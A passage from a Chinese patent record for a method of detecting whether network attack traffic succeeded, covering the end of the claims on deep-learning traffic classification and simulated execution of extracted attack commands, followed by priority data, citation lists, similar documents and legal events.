将所述攻击命令在所述仿真网络环境执行后实施的网络行为与预设网络行为相比,所述预设网络行为包括通过安全审计得到的网络行为;
若所述攻击命令在所述仿真网络环境执行后实施的网络行为与所述预设网络行为的相似度超过第一预设相似度阈值,则初次确定所述目标流量在所述真实网络环境中成功实施攻击;
若所述攻击命令在所述仿真网络环境执行后实施的网络行为与所述预设网络行为的相似度不超过所述第一预设相似度阈值,则将所述攻击命令在所述仿真网络环境执行后的回显信息与预设响应包相比,所述预设响应包为通过所述安全审计得到的攻击请求包对应的响应包;
若所述攻击命令在所述仿真网络环境执行后的回显信息与所述预设响应包的相似度超过第二预设相似度阈值,则再次确定所述目标流量在所述真实网络环境中成功实施攻击。
8.一种网络攻击结果检测装置,其特征在于,所述装置包括:
第一确定模块,用于对目标流量进行解码,得到所述目标流量中的净载荷;对所述净载荷进行分词并转换成标准表达形式,得到语句集合;将所述语句集合中每个词转化为向量,得到词向量矩阵;将所述词向量矩阵输入预先训练的深度学习模型,识别所述目标流量是否为攻击流量,所述预先训练的深度学习模型是基于语法和语义引擎对深度学习模型进行训练后得到的模型;
提取模块,用于若确定所述目标流量为攻击流量,则提取所述攻击流量中的攻击命令;
模拟模块,用于模拟所述攻击命令在真实网络环境的执行,得到所述攻击命令的模拟执行数据;
第二确定模块,用于将所述攻击命令的模拟执行数据与预设结果相比,确定所述目标流量在所述真实网络环境中是否成功实施攻击。
9.一种电子设备,其特征在于,包括:
处理器;以及
存储器,其上存储有可执行代码,当所述可执行代码被所述处理器执行时,使所述处理器执行如权利要求1至7中任意一项所述的方法。
10.一种计算机可读存储介质,其上存储有可执行代码,当所述可执行代码被电子设备的处理器执行时,使所述处理器执行如权利要求1至7中任意一项所述的方法。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210892150.2A CN115051873B (zh) | 2022-07-27 | 2022-07-27 | 网络攻击结果检测方法、装置和计算可读存储介质 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210892150.2A CN115051873B (zh) | 2022-07-27 | 2022-07-27 | 网络攻击结果检测方法、装置和计算可读存储介质 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN115051873A CN115051873A (zh) | 2022-09-13 |
| CN115051873B true CN115051873B (zh) | 2024-02-23 |
Family
ID=83166524
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202210892150.2A Active CN115051873B (zh) | 2022-07-27 | 2022-07-27 | 网络攻击结果检测方法、装置和计算可读存储介质 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115051873B (zh) |
Citations (22)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102223267A (zh) * | 2011-06-17 | 2011-10-19 | 北京电子科技学院 | 一种ids的检测方法及检测设备 |
| CN105404816A (zh) * | 2015-12-24 | 2016-03-16 | 北京奇虎科技有限公司 | 基于内容的漏洞检测方法及装置 |
| CN106998323A (zh) * | 2017-03-06 | 2017-08-01 | 深信服科技股份有限公司 | 应用层网络攻击仿真方法、装置及系统 |
| CN107592302A (zh) * | 2017-08-23 | 2018-01-16 | 北京国信云服科技有限公司 | 一种移动端的端口扫描器及方法 |
| CN108696713A (zh) * | 2018-04-27 | 2018-10-23 | 苏州科达科技股份有限公司 | 码流的安全测试方法、装置及测试设备 |
| CN108769071A (zh) * | 2018-07-02 | 2018-11-06 | 腾讯科技(深圳)有限公司 | 攻击信息处理方法、装置和物联网蜜罐系统 |
| CN108881263A (zh) * | 2018-06-29 | 2018-11-23 | 北京奇虎科技有限公司 | 一种网络攻击结果检测方法及系统 |
| CN111462726A (zh) * | 2020-03-30 | 2020-07-28 | 中国建设银行股份有限公司 | 一种外呼应答方法、装置、设备及介质 |
| US10769045B1 (en) * | 2017-09-26 | 2020-09-08 | Amazon Technologies, Inc. | Measuring effectiveness of intrusion detection systems using cloned computing resources |
| CN111835777A (zh) * | 2020-07-20 | 2020-10-27 | 深信服科技股份有限公司 | 一种异常流量检测方法、装置、设备及介质 |
| CN112364355A (zh) * | 2020-11-12 | 2021-02-12 | 中国石油天然气集团有限公司 | 主动发现分布式自建系统与扫描安全漏洞的方法 |
| CN112565266A (zh) * | 2020-12-07 | 2021-03-26 | 深信服科技股份有限公司 | 一种信息泄露攻击检测方法、装置、电子设备及存储介质 |
| CN112714138A (zh) * | 2021-03-29 | 2021-04-27 | 北京网测科技有限公司 | 基于攻击流量的测试方法、装置、设备及存储介质 |
| CN112822187A (zh) * | 2020-12-31 | 2021-05-18 | 山石网科通信技术股份有限公司 | 网络攻击的检测方法及装置 |
| KR20210063759A (ko) * | 2019-11-25 | 2021-06-02 | 국방과학연구소 | 사이버 위협 시나리오를 구성하는 장치, 방법, 컴퓨터 판독 가능한 기록 매체 및 컴퓨터 프로그램 |
| CN112953895A (zh) * | 2021-01-26 | 2021-06-11 | 深信服科技股份有限公司 | 一种攻击行为检测方法、装置、设备及可读存储介质 |
| CN113141332A (zh) * | 2020-01-17 | 2021-07-20 | 深信服科技股份有限公司 | 一种命令注入识别方法、系统、设备及计算机存储介质 |
| CN113392932A (zh) * | 2021-07-06 | 2021-09-14 | 中国兵器工业信息中心 | 一种深度入侵检测的对抗攻击系统 |
| CN113595799A (zh) * | 2021-08-03 | 2021-11-02 | 北京恒安嘉新安全技术有限公司 | 移动网络靶场系统以及网络流量攻击模拟方法 |
| CN113886812A (zh) * | 2021-09-26 | 2022-01-04 | 杭州安恒信息技术股份有限公司 | 检测防护方法、系统、计算机设备及可读存储介质 |
| CN114090719A (zh) * | 2021-11-26 | 2022-02-25 | 浙江百应科技有限公司 | 一种基于ast的抽象语义拆解分析方法、装置及电子设备 |
| CN114584330A (zh) * | 2020-11-16 | 2022-06-03 | 华为技术有限公司 | 漏洞测试方法及装置 |
Family Cites Families (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20030028803A1 (en) * | 2001-05-18 | 2003-02-06 | Bunker Nelson Waldo | Network vulnerability assessment system and method |
| US20090024623A1 (en) * | 2007-07-20 | 2009-01-22 | Andrei Zary Broder | System and Method to Facilitate Mapping and Storage of Data Within One or More Data Taxonomies |
| US8312542B2 (en) * | 2008-10-29 | 2012-11-13 | Lockheed Martin Corporation | Network intrusion detection using MDL compress for deep packet inspection |
| US20140337974A1 (en) * | 2013-04-15 | 2014-11-13 | Anupam Joshi | System and method for semantic integration of heterogeneous data sources for context aware intrusion detection |
| US9288223B2 (en) * | 2013-10-13 | 2016-03-15 | Skycure Ltd | Potential attack detection based on dummy network traffic |
| US11533329B2 (en) * | 2019-09-27 | 2022-12-20 | Keysight Technologies, Inc. | Methods, systems and computer readable media for threat simulation and threat mitigation recommendations |
| EP3958530A4 (en) * | 2020-06-22 | 2022-02-23 | Wangsu Science & Technology Co., Ltd. | METHOD, SYSTEM AND APPARATUS BASED ON A GRAPH NEURONAL NETWORK FOR DETECTING A NETWORK ATTACK |
-
2022
- 2022-07-27 CN CN202210892150.2A patent/CN115051873B/zh active Active
Patent Citations (22)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN102223267A (zh) * | 2011-06-17 | 2011-10-19 | 北京电子科技学院 | 一种ids的检测方法及检测设备 |
| CN105404816A (zh) * | 2015-12-24 | 2016-03-16 | 北京奇虎科技有限公司 | 基于内容的漏洞检测方法及装置 |
| CN106998323A (zh) * | 2017-03-06 | 2017-08-01 | 深信服科技股份有限公司 | 应用层网络攻击仿真方法、装置及系统 |
| CN107592302A (zh) * | 2017-08-23 | 2018-01-16 | 北京国信云服科技有限公司 | 一种移动端的端口扫描器及方法 |
| US10769045B1 (en) * | 2017-09-26 | 2020-09-08 | Amazon Technologies, Inc. | Measuring effectiveness of intrusion detection systems using cloned computing resources |
| CN108696713A (zh) * | 2018-04-27 | 2018-10-23 | 苏州科达科技股份有限公司 | 码流的安全测试方法、装置及测试设备 |
| CN108881263A (zh) * | 2018-06-29 | 2018-11-23 | 北京奇虎科技有限公司 | 一种网络攻击结果检测方法及系统 |
| CN108769071A (zh) * | 2018-07-02 | 2018-11-06 | 腾讯科技(深圳)有限公司 | 攻击信息处理方法、装置和物联网蜜罐系统 |
| KR20210063759A (ko) * | 2019-11-25 | 2021-06-02 | 국방과학연구소 | 사이버 위협 시나리오를 구성하는 장치, 방법, 컴퓨터 판독 가능한 기록 매체 및 컴퓨터 프로그램 |
| CN113141332A (zh) * | 2020-01-17 | 2021-07-20 | 深信服科技股份有限公司 | 一种命令注入识别方法、系统、设备及计算机存储介质 |
| CN111462726A (zh) * | 2020-03-30 | 2020-07-28 | 中国建设银行股份有限公司 | 一种外呼应答方法、装置、设备及介质 |
| CN111835777A (zh) * | 2020-07-20 | 2020-10-27 | 深信服科技股份有限公司 | 一种异常流量检测方法、装置、设备及介质 |
| CN112364355A (zh) * | 2020-11-12 | 2021-02-12 | 中国石油天然气集团有限公司 | 主动发现分布式自建系统与扫描安全漏洞的方法 |
| CN114584330A (zh) * | 2020-11-16 | 2022-06-03 | 华为技术有限公司 | 漏洞测试方法及装置 |
| CN112565266A (zh) * | 2020-12-07 | 2021-03-26 | 深信服科技股份有限公司 | 一种信息泄露攻击检测方法、装置、电子设备及存储介质 |
| CN112822187A (zh) * | 2020-12-31 | 2021-05-18 | 山石网科通信技术股份有限公司 | 网络攻击的检测方法及装置 |
| CN112953895A (zh) * | 2021-01-26 | 2021-06-11 | 深信服科技股份有限公司 | 一种攻击行为检测方法、装置、设备及可读存储介质 |
| CN112714138A (zh) * | 2021-03-29 | 2021-04-27 | 北京网测科技有限公司 | 基于攻击流量的测试方法、装置、设备及存储介质 |
| CN113392932A (zh) * | 2021-07-06 | 2021-09-14 | 中国兵器工业信息中心 | 一种深度入侵检测的对抗攻击系统 |
| CN113595799A (zh) * | 2021-08-03 | 2021-11-02 | 北京恒安嘉新安全技术有限公司 | 移动网络靶场系统以及网络流量攻击模拟方法 |
| CN113886812A (zh) * | 2021-09-26 | 2022-01-04 | 杭州安恒信息技术股份有限公司 | 检测防护方法、系统、计算机设备及可读存储介质 |
| CN114090719A (zh) * | 2021-11-26 | 2022-02-25 | 浙江百应科技有限公司 | 一种基于ast的抽象语义拆解分析方法、装置及电子设备 |
Non-Patent Citations (1)
| Title |
|---|
| 物联网蜜罐综述;游建舟;吕世超;孙玉砚;石志强;孙利民;;信息安全学报(04);第143-161页 * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN115051873A (zh) | 2022-09-13 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN109325326B (zh) | 非结构化数据访问时的数据脱敏方法、装置、设备及介质 | |
| Andronio et al. | Heldroid: Dissecting and detecting mobile ransomware | |
| ES2965917T3 (es) | Detección de debilidad de seguridad e infiltración y reparación en contenido de sitio web ofuscado | |
| US20160065613A1 (en) | System and method for detecting malicious code based on web | |
| CN109922052A (zh) | 一种结合多重特征的恶意url检测方法 | |
| CN102043915B (zh) | 一种非可执行文件中包含恶意代码的检测方法及其装置 | |
| Tajpour et al. | Comparison of SQL injection detection and prevention techniques | |
| Kasim | An ensemble classification-based approach to detect attack level of SQL injections | |
| CN113381962B (zh) | 一种数据处理方法、装置和存储介质 | |
| WO2015016952A1 (en) | Determining malware based on signal tokens | |
| CN105488400A (zh) | 一种恶意网页综合检测方法及系统 | |
| CN111416818A (zh) | 网站的安全防护方法、装置和服务器 | |
| CN114003903A (zh) | 一种网络攻击追踪溯源方法及装置 | |
| CN112817877B (zh) | 异常脚本检测方法、装置、计算机设备和存储介质 | |
| Kumar et al. | Performance evaluation of machine learning techniques for detecting cross-site scripting attacks | |
| US9507621B1 (en) | Signature-based detection of kernel data structure modification | |
| CN110598397A (zh) | 一种基于深度学习的Unix系统用户恶意操作检测方法 | |
| Kumar et al. | Cross site scripting (XSS) Vulnerability detection using machine learning and statistical analysis | |
| JP7439916B2 (ja) | 学習装置、検出装置、学習方法、検出方法、学習プログラムおよび検出プログラム | |
| CN115051873B (zh) | 网络攻击结果检测方法、装置和计算可读存储介质 | |
| CN116932381A (zh) | 小程序安全风险自动化评估方法及相关设备 | |
| US10706146B2 (en) | Scanning kernel data structure characteristics | |
| Sunkari et al. | Protect web applications against SQL Injection attacks using binary evaluation approach | |
| CN111563276A (zh) | 一种网页篡改检测方法、检测系统及相关设备 | |
| CN115378670B (zh) | 一种apt攻击识别方法、装置、电子设备及介质 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |